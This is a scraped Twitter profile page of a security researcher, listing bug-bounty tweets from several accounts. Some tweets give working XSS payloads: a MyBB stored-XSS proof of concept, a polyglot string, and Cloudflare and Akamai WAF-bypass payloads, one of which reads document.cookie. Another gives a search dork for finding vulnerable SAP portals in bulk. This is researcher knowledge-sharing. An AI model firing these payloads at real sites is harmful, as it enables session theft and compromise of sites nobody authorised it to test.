Michele Romano (@mik317_) 's Twitter Profile
Michele Romano

@mik317_

"The walls of Sparta are the chests of its warriors" - Agesilao

ID: 1094512121759571969

linkhttps://mik317.github.io/ calendar_today10-02-2019 08:23:19

2,2K Tweet

4,4K Takipçi

1,1K Takip Edilen

PT SWARM (@ptswarm) 's Twitter Profile Photo

🎁 PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [email][email protected]?[[email protected]? onmouseover=alert(1) a]a[/email][/email] Advisory: github.com/mybb/mybb/secu…

🎁 PoC for a stored XSS in MyBB &lt; 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy.

Payload: [email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email]

Advisory: github.com/mybb/mybb/secu…
shubs (@infosec_au) 's Twitter Profile Photo

We've just released the fourth episode of Bug Bounty Redacted! This episode is about a report where I was able to overwrite JS files via a PUT request ending up at S3 and an insecure JWT implementation. You can watch it here: youtube.com/watch?v=F7QvhH…

Intigriti (@intigriti) 's Twitter Profile Photo

🕸 Website: "Please enter your first name" 😎 You: "jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"

Ben Sadeghipour (@nahamsec) 's Twitter Profile Photo

With how important Attack Surface Management (ASM) has become, I've decided to launch a new series where I talk about and explain different ASM and recon methods in under 10 minutes. EP0 of ASM series is focused on the basics of ASM. Enjoy! youtu.be/sbkXpSeW77c

N$ (@nav1n0x) 's Twitter Profile Photo

Find an easy #XSS that found all-over the internet. Dork: inurl:"/irj/portal/" > visit the target, remove "/irj/portal/" from the url & add the payload in 2nd tweet. There are thousands of huge orgs with this #XSS, I reported > 150. Thank me later.#BugBountyTips #infosec

Find an easy #XSS that found all-over the internet. 
Dork: inurl:"/irj/portal/" &gt; visit the target, remove "/irj/portal/" from the url &amp; add the payload in 2nd tweet.  There are thousands of huge orgs with this #XSS, I reported &gt; 150. Thank me later.#BugBountyTips #infosec
Julien | MrTuxracer 🇪🇺 (@mrtuxracer) 's Twitter Profile Photo

Thanks everyone who reached out! 😎 I've found a valid payload that requires adding the following (and ONLY this) sequence of %27%00%20, which confuses their filter for whatever reason and let me inject an on-handler after that sequence. WTF.

Ben Meer (@systemsunday) 's Twitter Profile Photo

The internet is free university. But 99% don’t know the best spots on this virtual campus. Here are the top websites to accelerate your learning 👇

THREAT CON (@threat_con) 's Twitter Profile Photo

📢📢We are ecstatic to announce that Frans Rosén from Detectify will be presenting his research on "Chaining abnormal flows in OAuth to takeover accounts" at #THREATCON2022 - Bounty Track on Sep 15, Kathmandu, Nepal 🎉 Don't miss it, book your tickets now. #infosec #bugbounty

📢📢We are ecstatic to announce that <a href="/fransrosen/">Frans Rosén</a> from <a href="/detectify/">Detectify</a>  will be presenting his research on "Chaining abnormal flows in OAuth to takeover accounts" at #THREATCON2022 - Bounty Track on Sep 15, Kathmandu, Nepal 🎉 

Don't miss it, book your tickets now.
#infosec #bugbounty
5pider (@c5pider) 's Twitter Profile Photo

90% of my Twitter DMs are asking me about how to start getting into Malware development. Well, I love answering them but it's easier to write a small thread about it so here we go. 1/12

Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

Cloudflare #XSS WAF Bypass. Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F #bugbountytips #cybersecurity #infosec #xss

Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

(XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #XSs #infosecurity #cybersecurity

Damian Rusinek (@drdr_zz) 's Twitter Profile Photo

7. Fuzz If you wanna go full for security, fuzz your custom functions that look a bit complicated to your eye. Remember the invariants from previous step? Now you will need it. Use Scribble (github.com/ConsenSys/scri…) to write them in a more formal way (still as comments).

Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

cloudflare #XSS bypass via onevent: Payload : "onx+%00+onpointerenter%3dalert(domain)+x" by @brutelogic #bugbountytips #infosec #hackerone #bugcrowd #secnhack #bugbounty #websecurity #cybersecurity

Sam Curry (@samwcyo) 's Twitter Profile Photo

New blog post detailing some findings from auditing the Next.js ecosystem: "Exploiting Web3's Hidden Attack Surface: Universal XSS on Netlify's Next.js Library" Huge thanks to shubs and Brett Buerhaus for helping explore this! samcurry.net/universal-xss-…

Ozgur Alp (@ozgur_bbh) 's Twitter Profile Photo

My blackhat presentation at @Synack booth about Unusual Auth Bypass Techniques now a blog post! Check it out if you haven’t already.